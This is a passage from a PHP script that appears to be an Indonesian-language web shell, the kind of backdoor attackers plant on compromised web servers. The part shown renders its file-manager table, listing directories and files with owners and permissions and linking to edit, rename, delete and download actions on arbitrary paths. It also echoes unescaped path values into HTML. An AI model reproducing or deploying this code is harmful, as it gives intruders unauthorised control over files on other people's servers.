2010. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2011. echo "<td class='td_home'><center>$dtype</center></td>";
2012. echo "<td class='td_home'><center>-</center></th></td>";
2013. echo "<td class='td_home'><center>$dtime</center></td>";
2014. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2015. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2016. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2017. echo "</tr>";
2018. }
2019. }
2020. } else {
2021. echo "<font color=red>Nggak bisa buka directory.</font>";
2022. }
2023. foreach($scandir as $file) {
2024. $ftype = filetype("$dir/$file");
2025. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2026. $size = filesize("$dir/$file")/1024;
2027. $size = round($size,3);
2028. if(function_exists('posix_getpwuid')) {
2029. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2030. $fowner = $fowner['name'];
2031. } else {
2032. //$downer = $uid;
2033. $fowner = fileowner("$dir/$file");
2034. }
2035. if(function_exists('posix_getgrgid')) {
2036. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2037. $fgrp = $fgrp['name'];
2038. } else {
2039. $fgrp = filegroup("$dir/$file");
2040. }
2041. if($size > 1024) {
2042. $size = round($size/1024,2). 'MB';
2043. } else {
2044. $size = $size. 'KB';
2045. }
2046. if(!is_file("$dir/$file")) continue;
2047. echo "<tr>";
2048. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2049. echo "<td class='td_home'><center>$ftype</center></td>";
2050. echo "<td class='td_home'><center>$size</center></td>";
2051. echo "<td class='td_home'><center>$ftime</center></td>";
2052. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2053. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2054. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>Ngedit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>Rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>Hapus</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>Donlot</a></td>";
2055. echo "</tr>";
2056. }
2057. echo "</table>";
2058. if(!is_readable($dir)) {
2059. //
2060. } else {
2061. echo "<hr>";
2062. }
2063. echo "<center>Copyright &copy; ".date("Y")." - <font color=Blue>NC</font></center>";
2064. }
2065. ?>
2066. </html>